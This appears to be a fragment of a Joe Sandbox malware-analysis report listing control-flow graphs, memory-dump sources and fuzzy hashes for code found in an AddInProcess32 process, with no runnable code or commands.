                                                                              control_flow_graph 1870 6306b1-6306dc 1872 6306de-6306e1 1870->1872 1873 6306e3-6306ff 1872->1873 1874 630704-630706 1872->1874 1873->1874 1875 630708 1874->1875 1876 63070d-630710 1874->1876 1875->1876 1876->1872 1878 630712-63082d 1876->1878 1897 630839-630848 1878->1897 1898 63082f-630833 1878->1898 1899 630ca6-630cb0 1897->1899 1900 63084e-630857 1897->1900 1898->1897 1901 63085d-630868 1900->1901 1902 630c9c-630ca1 1900->1902 1903 630c76-630c82 1901->1903 1904 63086e-630885 1901->1904 1902->1899 1903->1900 1905 630c88 1903->1905 1904->1903 1908 63088b-630894 1904->1908 1905->1899 1908->1902 1909 63089a-6308bf 1908->1909 1912 6308c5-6308dc 1909->1912 1913 630c64-630c70 1909->1913 1912->1913 1915 6308e2-6308eb 1912->1915 1913->1903 1913->1908 1915->1902 1916 6308f1-63090b 1915->1916 1918 630912-630914 1916->1918 1919 630916-630926 1918->1919 1920 63095e-630971 1918->1920 1925 630976-6309a9 1919->1925 1926 630928-630938 1919->1926 1921 630c40-630c44 1920->1921 1923 630c46 1921->1923 1924 630c4f-630c5e 1921->1924 1923->1924 1924->1913 1924->1915 1935 6309eb-6309fb 1925->1935 1936 6309ab-6309e9 1925->1936 1926->1925 1930 63093a-63094a 1926->1930 1930->1925 1934 63094c-63095c 1930->1934 1934->1920 1934->1925 1940 630a13-630a28 1935->1940 1941 6309fd-630a03 1935->1941 1946 630a2a-630a91 1936->1946 1940->1946 1942 630a07-630a09 1941->1942 1943 630a05 1941->1943 1942->1940 1943->1940 1955 630b43-630b63 1946->1955 1956 630a97-630a9a 1946->1956 1965 630b65-630ba6 1955->1965 1966 630bbb-630bc7 1955->1966 1957 630c21-630c26 1956->1957 1958 630aa0-630ab0 1956->1958 1967 630c2b-630c3e 1957->1967 1963 630ab6-630b0b 1958->1963 1964 630b39-630b3d 1958->1964 1963->1957 1990 630b11-630b2b 1963->1990 1964->1955 1964->1956 1965->1957 1988 630ba8-630bb9 1965->1988 1971 630bc9-630bcf 1966->1971 1972 630bdf-630bf4 1966->1972 1967->1921 1974 630bd3-630bd5 1971->1974 1975 630bd1 1971->1975 1980 630bf6-630c1f 1972->1980 1974->1972 1975->1972 1980->1967 1988->1980 1990->1957 1993 630b31-630b37 1990->1993 1993->1955
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: &55p
                                                                              • API String ID: 0-1955183375
                                                                              • Opcode ID: f20487bcb0be2fa61d1cd37f3598907385f15d7cc47bca932b29995148d86014
                                                                              • Instruction ID: 30adea6e55ddca483df641618741ca489fefeac4ce3342b7acab4272ec531d51
                                                                              • Opcode Fuzzy Hash: f20487bcb0be2fa61d1cd37f3598907385f15d7cc47bca932b29995148d86014
                                                                              • Instruction Fuzzy Hash: 71812B70A01244CFEB18EB65C594B9EB7B7BF84340F248569E405AB3A9DB35AC46CB90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2456 630040-630060 2457 630062-630065 2456->2457 2458 630067-630083 2457->2458 2459 630088-63008b 2457->2459 2458->2459 2460 6300a6-6300a9 2459->2460 2461 63008d-63009b 2459->2461 2462 6300af-6300bf 2460->2462 2463 6301bc-6301bf 2460->2463 2470 6300a1 2461->2470 2471 6302d0-6302da 2461->2471 2475 6301b1-6301bb 2462->2475 2476 6300c5-6300f8 2462->2476 2465 6301c1-6301da 2463->2465 2466 6301df-6301e2 2463->2466 2465->2466 2472 6302cb-6302ce 2466->2472 2473 6301e8-63025f 2466->2473 2470->2460 2472->2471 2474 6302db-6302de 2472->2474 2514 630322-630354 2473->2514 2515 630265-6302ba 2473->2515 2479 6302e0-6302fb 2474->2479 2480 630306-630308 2474->2480 2494 630106 2476->2494 2495 6300fa-630104 2476->2495 2479->2473 2491 630301 2479->2491 2482 63030a 2480->2482 2483 63030f-630312 2480->2483 2482->2483 2483->2457 2487 630318-630321 2483->2487 2491->2480 2496 63010b-63010d 2494->2496 2495->2496 2498 630113-630117 2496->2498 2499 63019a-6301ab 2496->2499 2500 630119-630126 2498->2500 2501 630128 2498->2501 2499->2475 2499->2476 2502 63012d-63012f 2500->2502 2501->2502 2502->2499 2505 630131-630133 2502->2505 2506 630141 2505->2506 2507 630135-63013f 2505->2507 2509 630146-630148 2506->2509 2507->2509 2509->2499 2510 63014a-630193 2509->2510 2510->2499 2520 630356-630359 2514->2520 2515->2462 2549 6302c0-6302ca 2515->2549 2521 630382-630385 2520->2521 2522 63035b-630375 call 2dde25 2520->2522 2524 630387-6303a3 2521->2524 2525 6303a8-6303aa 2521->2525 2544 63037a-63037d 2522->2544 2524->2525 2529 6303b1-6303b4 2525->2529 2530 6303ac 2525->2530 2529->2520 2531 6303b6-6303c2 2529->2531 2530->2529 2534 630675-630678 2531->2534 2535 6303c8-6303d1 2531->2535 2543 63069f-6306a8 2534->2543 2539 6303d7-6303f8 2535->2539 2540 63067a-630698 2535->2540 2552 630402-63043c 2539->2552 2553 6303fa-6303fd 2539->2553 2540->2543 2544->2521 2560 630446-63044c 2552->2560 2561 63043e-630441 2552->2561 2553->2543 2562 630663-63066f 2560->2562 2563 630452-6304b8 2560->2563 2561->2543 2562->2534 2562->2535 2563->2540 2572 6304be-6304c8 2563->2572 2572->2540 2573 6304ce-6304e4 2572->2573 2573->2540 2575 6304ea-630505 2573->2575 2578 630507-63050c 2575->2578 2579 630514-63051b 2575->2579 2578->2579 2579->2540 2580 630521-63052b 2579->2580 2581 63053a-630541 2580->2581 2582 63052d-630532 2580->2582 2581->2540 2583 630547-630551 2581->2583 2582->2581 2584 630553-630558 2583->2584 2585 630560-630567 2583->2585 2584->2585 2585->2540 2586 63056d-63057d 2585->2586 2587 63057f-630584 2586->2587 2588 63058c-630593 2586->2588 2587->2588 2588->2540 2589 630599-6305a3 2588->2589 2590 6305b2-6305b9 2589->2590 2591 6305a5-6305aa 2589->2591 2590->2540 2592 6305bf-6305d7 2590->2592 2591->2590 2594 6305d9-6305e6 2592->2594 2595 6305e8 2592->2595 2596 6305ed-6305ef 2594->2596 2595->2596 2597 6305f1-6305f3 2596->2597 2598 630656-63065d 2596->2598 2599 630601 2597->2599 2600 6305f5-6305ff 2597->2600 2598->2562 2598->2563 2601 630606-630608 2599->2601 2600->2601 2601->2598 2602 63060a-63064f 2601->2602 2602->2598
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d334d77d3a52fa3f1cc6abb6e0a4ebf39bbe5ed5c9e0a948ba4b45edc2f02ee4
                                                                              • Instruction ID: 860a999211a5877129c3a694c20e1a61a6914b2d5e20efe3344950847b29645e
                                                                              • Opcode Fuzzy Hash: d334d77d3a52fa3f1cc6abb6e0a4ebf39bbe5ed5c9e0a948ba4b45edc2f02ee4
                                                                              • Instruction Fuzzy Hash: 76028C30B002049FEB14EB64D5A5BAEB7F3EF84314F148569E40AAB395DB35ED46CB80

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 3142 634688-6346a1 3143 6346a3-6346a6 3142->3143 3144 6346b3-6346b6 3143->3144 3145 6346a8-6346ac 3143->3145 3146 6346d9-6346dc 3144->3146 3147 6346b8-6346d4 3144->3147 3148 634707-634710 3145->3148 3149 6346ae 3145->3149 3150 6346fe-634701 3146->3150 3151 6346de-6346f1 call 634688 3146->3151 3147->3146 3152 634716-63471c 3148->3152 3153 6347e9-6347f3 3148->3153 3149->3144 3150->3148 3155 6347f4-6347f7 3150->3155 3169 6346f7-6346f9 3151->3169 3156 634722-634741 3152->3156 3157 634820-634834 3152->3157 3159 634804-634806 3155->3159 3160 6347f9-634803 3155->3160 3173 634747-634782 3156->3173 3174 6347da-6347e3 3156->3174 3167 634872-634878 3157->3167 3168 634836-634855 3157->3168 3162 634808 3159->3162 3163 63480d-634810 3159->3163 3162->3163 3163->3143 3166 634816-63481f 3163->3166 3172 63487d-634880 3167->3172 3171 634857-63485a 3168->3171 3169->3150 3171->3172 3175 63485c-63486d 3171->3175 3176 634886-6348ac 3172->3176 3177 6349dc-6349de 3172->3177 3192 634784-634787 3173->3192 3193 63478c-634796 3173->3193 3174->3152 3174->3153 3175->3167 3189 6348b3-6348e1 3176->3189 3178 6349e0 3177->3178 3179 6349e5-6349e8 3177->3179 3178->3179 3179->3171 3183 6349ee-6349f7 3179->3183 3202 6348e3-6348ed 3189->3202 3203 634958-63497c 3189->3203 3192->3166 3193->3174 3196 634798-6347ac 3193->3196 3199 6347ba 3196->3199 3200 6347ae-6347b8 3196->3200 3204 6347bf-6347c1 3199->3204 3200->3204 3209 634905-634956 3202->3209 3210 6348ef-6348f5 3202->3210 3215 634986 3203->3215 3216 63497e 3203->3216 3206 6347c3-6347c6 3204->3206 3207 6347cd-6347d8 3204->3207 3206->3207 3207->3174 3207->3196 3209->3202 3209->3203 3213 6348f7 3210->3213 3214 6348f9-6348fb 3210->3214 3213->3209 3214->3209 3215->3177 3216->3215
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ef60e18d82bfa9200aa6669b64f237cea9eee4529c2d8f4fdfdef1e29f740726
                                                                              • Instruction ID: 0a976e51df84af1eaa8574be92d8c853290040ee51eca32619d0cef27b88efe1
                                                                              • Opcode Fuzzy Hash: ef60e18d82bfa9200aa6669b64f237cea9eee4529c2d8f4fdfdef1e29f740726
                                                                              • Instruction Fuzzy Hash: 24819B35B002088FDB14AB78D4957AEBBB7EB8A310F24456AD406DB395DF35EC46CB90
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 420096d2dd09cf73e4a13e862bd3073264dc46cae15d9e9d73184d92022cce75
                                                                              • Instruction ID: 83645656e1dbd258b98421ae5c0850b465929c8fb8bfe65c50ccdbe69164d828
                                                                              • Opcode Fuzzy Hash: 420096d2dd09cf73e4a13e862bd3073264dc46cae15d9e9d73184d92022cce75
                                                                              • Instruction Fuzzy Hash: 51912230B006198FDB64DF65C8A57AE77F6EFD4340F108466E809AB384EF71AD458B91
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 133ca80a2d0b1b538c51e448341bad65c19d852f914b9b3a91ea8d82841ee92a
                                                                              • Instruction ID: d4d1f5410f14928c03795b3cb832b0c54c8dc7af9c724eba6f8a94850a54c8d4
                                                                              • Opcode Fuzzy Hash: 133ca80a2d0b1b538c51e448341bad65c19d852f914b9b3a91ea8d82841ee92a
                                                                              • Instruction Fuzzy Hash: D65120307006059FDB54EF74D8A5BAE77E6AFC4350F10846AE80AEB394EB71AD41CB91
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.622445780.000000000018D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0018D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_18d000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 84b86cbf6782c9b7386b04be9bf9ddc4a2b4f5e42c5cb9392e845bc9ce7fdc7b
                                                                              • Instruction ID: aca9624dc753786686a821b67d9652a389b09f152f4b849ef875ebad77081d0d
                                                                              • Opcode Fuzzy Hash: 84b86cbf6782c9b7386b04be9bf9ddc4a2b4f5e42c5cb9392e845bc9ce7fdc7b
                                                                              • Instruction Fuzzy Hash: 7021D475604340EFEB14EF14E9C4B16BB65EB84324F34C6A9E8494B286C73AD947CFA1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 5bd536b87db8ed61078bd17863ce7b2e2d9f05da050864aced1999ba8381eef4
                                                                              • Instruction ID: 9a40f0d54c6f1953e2d42ecbfd727025dc6565e4c74ad0456d6a391048cd2be5
                                                                              • Opcode Fuzzy Hash: 5bd536b87db8ed61078bd17863ce7b2e2d9f05da050864aced1999ba8381eef4
                                                                              • Instruction Fuzzy Hash: 6421D434A00209CFEB14DBA4D5E5AEEB7B6FF48315F249216D815A7369D730AC86CF90
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 262f969f8980f695cbed82e8629265fc3943264ce3f7564d48d465a157687049
                                                                              • Instruction ID: 13588e02478a7884d20420010999f5cb5d4191f21807baf36c2b34b57a0f3a29
                                                                              • Opcode Fuzzy Hash: 262f969f8980f695cbed82e8629265fc3943264ce3f7564d48d465a157687049
                                                                              • Instruction Fuzzy Hash: 2201D4307046545FC721AB38D8647AA7BE6DFC7710F15887AE04ACF352DA25EE0187E1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.622445780.000000000018D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0018D000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_18d000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                                              • Instruction ID: 372f23dc4350e47687085f5e79de25169a16d31a92139c3890226d5e94c427cb
                                                                              • Opcode Fuzzy Hash: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                                              • Instruction Fuzzy Hash: 89118B75504380DFDB11DF14E5C4B15BBA1FB84314F24C6AAE8494B696C33AD94ACFA2
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e2e7c3ad3bb10f803404c7a0f46814ec135eb04cc1f6e33dd986b242637b4552
                                                                              • Instruction ID: bcf58659168bc07f6fa0b860193d2d79c583d61558ab8b3618b3860ebfbeca38
                                                                              • Opcode Fuzzy Hash: e2e7c3ad3bb10f803404c7a0f46814ec135eb04cc1f6e33dd986b242637b4552
                                                                              • Instruction Fuzzy Hash: 4B01A2317042584FDB216B3998656AE7BA6DBD3311F14487AE146CF291CE54ED038391
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f5a6fb67792a3c555bff7d3448dab6166d49d33cf6acf42d23d2800c61acefb2
                                                                              • Instruction ID: 8e0cf0e7b717827fc14cd7f94d1f0b634a534ea8408adf63a0020d999924ad38
                                                                              • Opcode Fuzzy Hash: f5a6fb67792a3c555bff7d3448dab6166d49d33cf6acf42d23d2800c61acefb2
                                                                              • Instruction Fuzzy Hash: A50181307005245FDB20AA38D8A579A73DBDFC5750F108839F10ACB354EB21EE0287D1
                                                                              Memory Dump Source
                                                                              • Source File: 0000000A.00000002.623785794.0000000000630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00630000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_10_2_630000_AddInProcess32.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b4a13d6b02f88e26c7979c750653efa25f049b73a85a28c7bee0b8ae0b734b2c
                                                                              • Instruction ID: c230354db7626bc2794c011f3a7f041ac133a2d27f48b63335091afea84fe78b
                                                                              • Opcode Fuzzy Hash: b4a13d6b02f88e26c7979c750653efa25f049b73a85a28c7bee0b8ae0b734b2c
                                                                              • Instruction Fuzzy Hash: 1FF05835A04208DFCF288E54E8846ECB7B6EF53351F284862D801AF260C3719A82CB90